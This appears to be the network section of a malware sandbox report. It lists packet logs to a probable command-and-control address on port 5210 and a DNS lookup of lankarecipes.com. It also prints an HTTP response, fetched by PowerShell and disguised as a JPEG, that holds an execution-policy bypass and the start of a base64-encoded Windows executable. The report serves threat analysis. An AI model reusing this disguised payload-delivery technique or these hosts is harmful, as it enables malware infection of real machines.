                                                                                                                                                      Jan 8, 2021 09:41:41.440505981 CET52104974945.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:41.440757990 CET497495210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:41.615154982 CET52104974945.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:42.229912996 CET497495210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:42.406383991 CET52104974945.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:42.406487942 CET497495210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:42.607042074 CET52104974945.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.041692972 CET497495210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.126991034 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.164443970 CET52104974945.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.263847113 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.264020920 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.265079021 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.440042973 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.472600937 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.472646952 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.472882032 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.538670063 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.702084064 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:43.702500105 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:43.887804031 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:44.328001976 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:44.507375956 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:44.507548094 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:44.675466061 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:44.692756891 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:44.693345070 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:44.816817045 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:44.869656086 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:45.342307091 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:45.529866934 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:45.529969931 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:45.714838028 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:46.292371988 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:46.464720964 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:46.464924097 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:46.663043022 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.246532917 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:47.362152100 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:47.395605087 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.498074055 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.498230934 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:47.498816967 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:47.675072908 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.775710106 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.775752068 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.775870085 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:47.835465908 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:47.980833054 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:47.981117964 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:48.172352076 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:48.531801939 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:48.715615034 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:48.900698900 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:48.948019028 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:49.101968050 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:49.151245117 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:49.553556919 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:49.741060019 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:50.527424097 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:50.727261066 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:50.727387905 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:50.762157917 CET52104975045.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:50.762289047 CET497505210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:50.764158010 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:50.764372110 CET52104974945.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:50.764435053 CET497495210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:50.807542086 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:51.017888069 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:51.017991066 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:51.305038929 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:51.589557886 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:51.679177046 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:51.749705076 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:51.801887035 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:51.802165985 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:51.802905083 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:52.001440048 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:52.001472950 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:52.001640081 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:52.072837114 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:52.209254026 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:52.209860086 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:52.408689976 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:52.845742941 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:53.094100952 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:53.135793924 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:53.262388945 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:53.307806969 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:53.858696938 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:54.221800089 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:54.826072931 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:55.009603024 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:55.009844065 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:55.299662113 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:55.789350986 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:55.931848049 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:55.938239098 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.079889059 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:56.079999924 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.080467939 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.260901928 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:56.260956049 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:56.261236906 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.328670025 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.477401018 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:56.477886915 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.712501049 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:56.815849066 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:56.870469093 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:56.993376970 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:57.042378902 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:57.109986067 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:57.411902905 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:58.125154018 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:58.314872026 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:59.105835915 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:59.410185099 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:59.410418034 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:41:59.699512005 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.089889050 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.175240993 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.220946074 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.301218033 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.301371098 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.312700987 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.490928888 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.490983009 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.491173029 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.560237885 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.699776888 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.702119112 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.909123898 CET52104975345.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.909276009 CET497535210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.909615040 CET52104975245.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.909723043 CET497525210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:00.918494940 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.923090935 CET52104975145.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:00.923207045 CET497515210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:01.360424995 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:01.402154922 CET497545210192.168.2.345.15.143.216
                                                                                                                                                      Jan 8, 2021 09:42:01.526964903 CET52104975445.15.143.216192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:42:01.574055910 CET497545210192.168.2.345.15.143.216

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 8, 2021 09:39:43.140170097 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:43.190962076 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:44.262322903 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:44.313060999 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:45.916346073 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:45.966993093 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:47.308192015 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:47.356093884 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:53.088768005 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:53.139488935 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:54.186609983 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:54.255376101 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:54.396749020 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:54.444657087 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:54.671363115 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:54.753156900 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:55.658474922 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:55.714569092 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:56.677800894 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:56.733927965 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:58.110378981 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:58.168972015 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:58.674232960 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:58.722148895 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:59.276077032 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:59.326185942 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:00.566582918 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:00.622672081 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:01.560962915 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:01.609003067 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:02.689992905 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:02.759257078 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:03.782341957 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:03.833195925 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:07.308516979 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:07.356626987 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:11.355046034 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:11.426053047 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:14.180423975 CET5872253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:14.180705070 CET5659653192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:14.183274031 CET6410153192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:14.228439093 CET53565968.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:14.230950117 CET53641018.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:14.231075048 CET53587228.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:23.060261011 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:23.108124971 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:24.589523077 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:24.778623104 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:31.270092010 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:31.320974112 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:36.791923046 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:36.852351904 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:08.342684031 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:41:08.400568962 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:10.534939051 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:41:10.599462032 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:38.239742994 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:41:38.287874937 CET53606338.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Jan 8, 2021 09:40:24.589523077 CET192.168.2.38.8.8.80x3d62Standard query (0)lankarecipes.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Jan 8, 2021 09:40:24.778623104 CET8.8.8.8192.168.2.30x3d62No error (0)lankarecipes.com192.185.236.165A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • lankarecipes.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349731192.185.236.16580C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Jan 8, 2021 09:40:25.081321955 CET1269OUTGET /Sparc.jpg HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                      Host: lankarecipes.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jan 8, 2021 09:40:25.271898031 CET1270INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 08 Jan 2021 08:40:25 GMT
                                                                                                                                                      Server: Apache
                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                      Connection: Upgrade, Keep-Alive
                                                                                                                                                      Last-Modified: Wed, 06 Jan 2021 16:45:57 GMT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 2326467
                                                                                                                                                      Keep-Alive: timeout=5, max=75
                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                      Data Raw: 20 53 45 74 2d 45 78 45 63 55 74 69 4f 6e 50 4f 6c 49 63 59 20 62 59 70 61 73 53 20 2d 73 43 6f 50 65 20 70 52 4f 43 45 53 73 20 2d 46 4f 72 63 45 20 3b 20 24 6b 76 45 53 6e 65 75 6d 54 62 72 74 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 41 33 59 73 54 61 63 77 4f 71 69 58 4d 44 71 6f 6c 7a 41 36 71 4a 38 42 2b 6b 69 58 49 44 71 6f 6c 46 4a 61 65 4a 63 67 4f 71 69 54 77 68 6f 34 6c 32 41 36 71 4a 63 77 4f 71 69 58 45 44 71 6f 6c 53 61 57 4e 6f 63 77 4f 71 69 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 55 41 74 75 6a 31 58 77 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 41 51 73 42 42 67 41 41 63 42 6b 41 41 46 41 41 41 41 41 41 41 41 41 63 45 67 41 41 41 42 41 41 41 41 43 41 47 51 41 41 41 45 41 41 41 42 41 41 41 41 41 51 41 41 41 45 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 4f 41 5a 41 41 41 51 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 51 41 41 41 51 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 49 4d 5a 41 46 41 41 41 41 41 41 73 42 6b 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 42 6b 41 2f 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 47 51 42 30 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4c 6e 52 6c 65 48 51 41 41 41 42 45 59 42 6b 41 41 42 41 41 41 41 42 77 47 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 59 43 35 79 5a 47 46 30 59 51 41 41 2f 41 6b 41 41 41 43 41 47 51 41 41 45 41 41 41 41 49 41 5a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 41 75 5a 47 46 30 59 51 41 41 41 45 67 56 41 41 41 41 6b 42 6b 41 41 42 41 41 41 41 43 51 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 44 41 4c 6e 4a 7a 63 6d 4d 41 41 41 41 51 41 41 41 41 41 4c 41 5a 41 41 41 51 41 41 41 41 6f 42 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 43 35 79 5a 57 78 76 59 77 41 41 61 68 6b 41 41 41 44 41 47 51 41 41 49 41 41 41 41 4c 41 5a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: SEt-ExEcUtiOnPOlIcY bYpasS -sCoPe pROCESs -FOrcE ; $kvESneumTbrt = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA3YsTacwOqiXMDqolzA6qJ8B+kiXIDqolFJaeJcgOqiTwho4l2A6qJcwOqiXEDqolSaWNocwOqiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUAtuj1XwAAAAAAAAAA4AAOAQsBBgAAcBkAAFAAAAAAAAAcEgAAABAAAACAGQAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAOAZAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATIMZAFAAAAAAsBkAEAAAAAAAAAAAAAAAAAAAAAAAAAAAwBkA/AgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAGQB0AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABEYBkAABAAAABwGQAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA/AkAAACAGQAAEAAAAIAZAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAEgVAAAAkBkAABAAAACQGQAAAAAAAAAAAAAAAABAAADALnJzcmMAAAAQAAAAALAZAAAQAAAAoBkAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAahkAAADAGQAAIAAAALAZAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.271929979 CET1272INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.271949053 CET1273INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
